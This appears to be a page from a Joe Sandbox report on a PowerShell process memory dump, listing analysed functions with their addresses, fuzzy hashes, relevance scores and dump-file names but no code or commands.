Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59bd3ac10152b41f7203c92da80cbf251157702d529506726a99bc29232755d8
Instruction ID: 4aafbf5049952da080325e30a198608556759876fc50184fd86f8c44599ff76c
Opcode Fuzzy Hash: 59bd3ac10152b41f7203c92da80cbf251157702d529506726a99bc29232755d8
Instruction Fuzzy Hash: AE22E53160C3198BD724DF18D8806BBB3E1EFC5319F29892EDA8697381D73CA955CB46

Function 0052CEC0 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1986c41ceb7e1aa6cfed2d7a34c6fce3fce2841d2d0718dccdb3db6e423fc6
Instruction ID: 3cf02c0296f99b1264230feab311ba48708a8c40ed353bbfc141c8eb3c16d14d
Opcode Fuzzy Hash: ed1986c41ceb7e1aa6cfed2d7a34c6fce3fce2841d2d0718dccdb3db6e423fc6
Instruction Fuzzy Hash: CE121075B08214CFC718CF68E8905AABBF2FF8E315F0984ADD58697391D734A805DB50

Function 00511C71 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 640865aa95954e33267ad031012a5bb9de43f3afe8a6f14ee3eed9e0adaaf029
Instruction ID: 22f8340c6dcef054dd740e9704e3aa9f3edd8455f24c6da75739d70810942c8a
Opcode Fuzzy Hash: 640865aa95954e33267ad031012a5bb9de43f3afe8a6f14ee3eed9e0adaaf029
Instruction Fuzzy Hash: 10F1FF31A18202CFD718CF28EC5166AB7E1FB98310F49897CE995C73A1D738EA65DB40

Function 0052D020 Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e3ad24755db8db5524fccc0f4f88cff4eef2b11246252438ef1b7477e7035d
Instruction ID: 52a5d89837610448ab9d2fed4cc2d171e84cc705a5b655c1459165d3580b0b03
Opcode Fuzzy Hash: 06e3ad24755db8db5524fccc0f4f88cff4eef2b11246252438ef1b7477e7035d
Instruction Fuzzy Hash: 09F10075A08225CFC718CF78E8905AABBF2FF8E315F1984ADD58697391D730A805DB50

Function 00514B4E Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b90d18ae15808d35e92b44c9750ba0275a5fd573163a1e0ed487c9c1213661
Instruction ID: 114034d9b18c120183938c1431c54cef9e75878cba69af98ee8efc47cce885a2
Opcode Fuzzy Hash: c4b90d18ae15808d35e92b44c9750ba0275a5fd573163a1e0ed487c9c1213661
Instruction Fuzzy Hash: 6CF1D6B5E01216CFEB18CFA8D8916AEBBB1FF59300F544568D501AB392D734A981CFD0

Function 0052D0B0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a6f884ec9d1190c6984b5f0febd81129687eeb5584c0d542ccad373c69decf
Instruction ID: 4e0a6d06b3342bbab1277550445f9b9c3b84eac4002201447768feb3737997ab
Opcode Fuzzy Hash: 26a6f884ec9d1190c6984b5f0febd81129687eeb5584c0d542ccad373c69decf
Instruction Fuzzy Hash: 21E11175A08224CFC718CF78E8906AABBF2FF8E315F1944ADD58297391D730A905CB50

Function 005111C0 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184f556f7e444d6be6a7f2f2ce4d03849e5c49160ab2e6c80573f75c0f93bab5
Instruction ID: dedbf643659f3266cd5c9d79446a042d310da3d82bf4ad95aa1554d647691be9
Opcode Fuzzy Hash: 184f556f7e444d6be6a7f2f2ce4d03849e5c49160ab2e6c80573f75c0f93bab5
Instruction Fuzzy Hash: BBB16D756046104BEB109F28DC827BBBBE1FF91354F08896CE996D7391E378D845C36A

Function 004FB4E6 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473b38a73a66e4465c6ed8eb35a7fbcd675989359a64f79cf0b0cfe86da2a1f1
Instruction ID: f8b0bc84d4e983985e5ef5eebebf267cf3bc36061111252c9b9c78854d41ce98
Opcode Fuzzy Hash: 473b38a73a66e4465c6ed8eb35a7fbcd675989359a64f79cf0b0cfe86da2a1f1
Instruction Fuzzy Hash: 0CA1AA75204B06CFD7248F25EC91B27B7F1FB9A310F008968E55A87BA0D730A859EB60

Function 004FB2DC Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e674c370fc7506e933932f9d5c36b96245d8dadcb4382c6dec1dc363024ce5
Instruction ID: 7f182db6df052c5c5c1920c4b4475e078e082addcb1d742c0268f789172375d3
Opcode Fuzzy Hash: 65e674c370fc7506e933932f9d5c36b96245d8dadcb4382c6dec1dc363024ce5
Instruction Fuzzy Hash: B691FE71204B06DFD7258F25EC81B27BBF1FF9A310F148968E956877A1C730A819EB60

Function 004FB30C Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36fc5937ec8e07493889934c83d6c7470a105bbe4342825be15fd877e6b6db1
Instruction ID: 94874fe3bf132f04acc3586a45abd9c38b4427a749a4203f01f4c2ae84e1b8fd
Opcode Fuzzy Hash: b36fc5937ec8e07493889934c83d6c7470a105bbe4342825be15fd877e6b6db1
Instruction Fuzzy Hash: 8681DEB5204B01DFD7258F25EC81B27B7F1FF99310F048968E55A87BA1D730A859EB60

Function 0050A690 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1776a435a136a8ffaafb1bea4c09826118f5a11d20ee3c13c4ec062bad286d
Instruction ID: 6b15eaa2142acfea121117bbf86e4ceeb4cebd34ab3e3ee65a6db91f21f68855
Opcode Fuzzy Hash: 0c1776a435a136a8ffaafb1bea4c09826118f5a11d20ee3c13c4ec062bad286d
Instruction Fuzzy Hash: A68181B0910B008BD3209F39C9566A7BFF1FF56310F548A2DD4D68B794E335A41ACB92

Function 0052CA70 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3168b190ed4141c7efb0b97b537427f337573b584fde68645c34f43a83d72bad
Instruction ID: 48ca38e736f16a2c37d50cb2248c46d102d876d33bdf774e3e77c3416f81900c
Opcode Fuzzy Hash: 3168b190ed4141c7efb0b97b537427f337573b584fde68645c34f43a83d72bad
Instruction Fuzzy Hash: 97515533B296610BC71CCA388C5256BBAD3AFCAB10F1D853ED485D7396DA38DD068781

Function 0050DDB0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e133961311d72293b0a26691fbfbc6da36099cff5a31e56eb1443f9d38243a85
Instruction ID: 0adff22136200231bce154edd3c37901b35347a5090e3fd68161f5ade6f48542
Opcode Fuzzy Hash: e133961311d72293b0a26691fbfbc6da36099cff5a31e56eb1443f9d38243a85
Instruction Fuzzy Hash: EC612575A083924FC7258F69C88092E7FE1BF96314F48C2ADF8A54B3D2D675D805C7A2

Function 00511FAE Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 081468ba0f1bfab35942c528ec52b3467fe23ba39eacbbebfe3f669dc854281b
Instruction ID: 7a92f2f3e2ac5e6eafe1f76a69a32350e0d015ed13a616e6bfb6a9c13271210b
Opcode Fuzzy Hash: 081468ba0f1bfab35942c528ec52b3467fe23ba39eacbbebfe3f669dc854281b
Instruction Fuzzy Hash: 18511231A18202CFE718CF28DC8176AB7B6FF98350F48896CE586873A5C739E955DB40

Function 004FB188 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e4c6540644104ccf3c06d31a70bad9bf521596a6f4372a100f614f03a7e83cc
Instruction ID: a4685d1b4dd8b58012c444efe1a50abb1ff48173ef3e98e1b4965610a38a1371
Opcode Fuzzy Hash: 0e4c6540644104ccf3c06d31a70bad9bf521596a6f4372a100f614f03a7e83cc
Instruction Fuzzy Hash: 1651CEB5604B01DFC7259F25EC84A26B7F5FFA9305F008868E55A83B71D731A868EF21

Function 00511FB0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccd86834270160d91b91c88426076482cb970ba956a4702c3eccb9a8f0dab054
Instruction ID: aa83f97d4d5e45f75b9b6fe454a6c26f15fe91ba919bebfb7092cd860fe6ea8a
Opcode Fuzzy Hash: ccd86834270160d91b91c88426076482cb970ba956a4702c3eccb9a8f0dab054
Instruction Fuzzy Hash: 3451CE31A18202CFE718CF28D85176AB7A2FB98351F48897CE586C7395C739DA55DB40

Function 00517E01 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9acc3889d79f5a221b79a752ad0fd50959e3832481baac8a6e21d75a2995aeb
Instruction ID: f71e6ecc86121912b99b8ed0f227ab28ba2dc5d4afb1117e54b8f315ca667c72
Opcode Fuzzy Hash: e9acc3889d79f5a221b79a752ad0fd50959e3832481baac8a6e21d75a2995aeb
Instruction Fuzzy Hash: EE215731B0A218EBF7188B6CE880ABE7FB7FB59300F5806ACD14257662C7306C42C6D4

Function 0052E910 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3bde463f0f6c04a5daacf87a0145e3949ab8936bc2f3e71d9b54e42b82a876eb
Instruction ID: 211ba252fe13f86b5e1232fd0ef95cb4018cf116bfb10aad62574d78ac78bddb
Opcode Fuzzy Hash: 3bde463f0f6c04a5daacf87a0145e3949ab8936bc2f3e71d9b54e42b82a876eb
Instruction Fuzzy Hash: 27216B729083285BD724DF18E8816BAFBA6FFDA310F18845DE8D4973A1D631AD51C7D0

Function 0050590C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5273c994ba3bf1e7eb6b10b9edc81530a406faa8053784146ec9082db12463ec
Instruction ID: 2cb07e94c7aa3cd22dc8ab1e3c146e75d7918933750405e5498fd82db10b0665
Opcode Fuzzy Hash: 5273c994ba3bf1e7eb6b10b9edc81530a406faa8053784146ec9082db12463ec
Instruction Fuzzy Hash: 85018E72D51610CBE728CE60DC8173B7791FB99311F88492CE985A32E1E6206C45DAD0

Function 005044A7 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4fdc80c67b39aa0110a3e6794b16e9e2544ba2dc009c0e5f10f2377ba4ce065b
Instruction ID: 3fd8ecb9d67fe4fb781ebcbb9b4b6e32b8399c7aa281a9e3a870c81ec19f9328
Opcode Fuzzy Hash: 4fdc80c67b39aa0110a3e6794b16e9e2544ba2dc009c0e5f10f2377ba4ce065b
Instruction Fuzzy Hash: 901150B5D183249BD3249E54BD4172A7991B798B00F14851CEBC0A72E5E9708C4096C4

Function 00524010 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 9abaf4d44a4d673099c635086ec20afbb1e31468f17ca234c03012ade21820fe
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 86110633A051E40EC3168D3C9444669BFE32F93634F194799E4B89F2D2D6238DCA8B50

Function 005192B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d931a03cc70c10d7111e64b824a11218f7167014e8a345f12e32dc7c7ec5f04f
Instruction ID: 54ac56ef062977b01c0d3d948e3bdfdb09137cdd2fc4a441af77b70add6ec5f7
Opcode Fuzzy Hash: d931a03cc70c10d7111e64b824a11218f7167014e8a345f12e32dc7c7ec5f04f
Instruction Fuzzy Hash: 9801D4F560030157FB209E5598D0B7BBAA87F80708F08483CE92547242DB7DFD45C2A5

Function 0050AA00 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39672de40dc4472e2769c20bba9ee57655c4d668340bd6f9cabb571b1edffe67
Instruction ID: 23efa33cb21aca1310c62d51ef3a0045dfb3c5578c18749c97c7dc6d4e601542
Opcode Fuzzy Hash: 39672de40dc4472e2769c20bba9ee57655c4d668340bd6f9cabb571b1edffe67
Instruction Fuzzy Hash: AD01A421604792CBE715CF3A8450677FFE2BFE3310F189599C0D69B2D2C634A98ACB51

Function 00523FF2 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c57178cc8e0840735ab973033a5ccd9f449b95052c24dd3031e005403d6a4bf
Instruction ID: f4bf005e27002b60193b1e20215a6fba78d0d581aa3af0a5a70cf9216c0eac87
Opcode Fuzzy Hash: 7c57178cc8e0840735ab973033a5ccd9f449b95052c24dd3031e005403d6a4bf
Instruction Fuzzy Hash: 77F0F677E041A04FC324C93CE488668BFA1BFDB220B190698DA69EB3D1E6219C858F40

Function 004FA370 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c2837e2f5322fb5633f7227b7e63df22d16532e45c2695a81ad6b97559852f
Instruction ID: fab991da86a26c2a9c27da03b4c86ab671cbe841e0169dec18a15c1602bc3243
Opcode Fuzzy Hash: d0c2837e2f5322fb5633f7227b7e63df22d16532e45c2695a81ad6b97559852f
Instruction Fuzzy Hash: 41B0121088C6504981048D00804047AFAF44547002F013149A4C863413C024C1404908

Function 00522558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 005224F2
GetSystemMetrics.USER32 ref: 0052258C
GetSystemMetrics.USER32 ref: 0052259B

Strings

, xrefs: 00522650

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
